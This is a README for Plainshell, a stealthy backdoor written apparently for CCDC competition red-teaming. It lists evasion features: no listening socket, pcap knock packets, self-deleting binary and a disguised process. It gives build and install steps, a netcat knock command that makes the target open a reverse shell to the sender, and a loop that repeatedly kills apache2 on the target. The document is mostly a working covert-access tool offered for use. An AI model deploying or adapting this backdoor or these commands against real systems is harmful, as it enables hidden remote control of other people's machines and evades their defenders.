README

1. Plainshell
2. Plainshell is a small backdoor meant to be hard to find.
3.  
4. It is a response to a certain CCDC team catching most of my malware by inspecting the output of netstat.
5.  
6. Sneaky Features
7. There are several things Plainshell does which (hopefully) makes it a bit harder to find:
8.  
9. No command-line arguments. Feel free to use whatever looks normal in the process list. Config is accomplished by editing config.h.
10. No listening socket. Sessions are initiated via a UDP packet read via pcap.
11. The connected shell is /bin/sh, with stdio hooked up to the network, so no danger of the binary being pulled out of /proc/pid/exe.
12. The connected shell has a parent PID of 1 and is its session leader.
13.  
14. Compilation
15. 1. Edit config.h
16. 2. Run ./build.sh in the Plainshell directory
17.  
18. Installation
19. 1. Upload
20. 2 ./backdoor (with a better name, hopefully).
21.  
22. Once started, Plainshell will:
23. - Remove its binary (assuming you didn't use exec -a)
24. - Background itself (via daemon(3))
25. - Remove a leading ./ from its process name
26. - Passively watch the network for knock packets
27.  
28. Knocking
29. Plainshell passively monitors the network for packets matching a given BPF filter (set in config.h). The last six bytes of the packet are the IPv4 address and port to which to connect, as so:
30.  
31. ...packet | address | port |
32. --------->|<---4--->|<-2-->|
33.  
34. The same binary can be used with the --k flag to generate this packet:
35.  
36. ./plainshell --k 192.168.1.2 443 | nc -u -p 31337 192.168.1.3 53
37. nc -vl 443 (BSD)
38. nc -vlp 443 (Linux)
39. The above would send a packet to the Plainshell at 192.168.1.3 with UDP destination port 53 and source port 31337, requesting a shell to call back to 102.168.1.2:443 (TCP)
40. Since Plainshell listens with pcap, host-based firewalls (i.e. iptables or pf) shouldn't prevent knock packets from getting through.
41.  
42. Shell
43. Before the shell calls back, the process will wait a configurable number of seconds to allow for a one-line knock/netcat command.
44.  
45. The shell that calls back will be completely unencrypted; it's just /bin/sh with stdio connected to the network connection. Don't expect a prompt.
46.  
47. Irritating CCDC Defenders:
48. while :; do
49.        ./plainshell --k 192.168.0.2 4444 | nc -Nup 31337 192.168.0.3 53
50.        echo killall apache2 | nc -vlN 4444
51.        sleep 60
52. done